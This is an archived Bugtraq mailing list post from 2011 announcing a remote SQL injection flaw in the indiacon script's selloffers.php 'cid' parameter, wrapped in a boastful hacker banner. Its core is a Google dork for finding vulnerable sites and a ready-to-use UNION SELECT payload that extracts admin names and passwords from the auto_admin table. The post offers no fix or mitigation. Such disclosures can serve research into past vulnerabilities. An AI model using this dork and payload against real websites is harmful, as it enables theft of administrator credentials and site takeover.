Bugtraq mailing list archives
indiacon (selloffers.php?cid) Remote SQL injection Vulnerability
From: ehsan_hp200 () hotmail com
Date: Thu, 28 Jul 2011 05:32:17 GMT
############################### IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## indiacon (selloffers.php?cid) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200 () Hotmail com ## ## Vendor : http://www.indiacon.com/ ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Dork : inurl:selloffers.php?cid= "Powered by indiacon.com" Exploite: www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin ######################################################################################### SpeCial TanX To : Dj7Xpl ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################
Current thread:
- indiacon (selloffers.php?cid) Remote SQL injection Vulnerability ehsan_hp200 (Jul 28)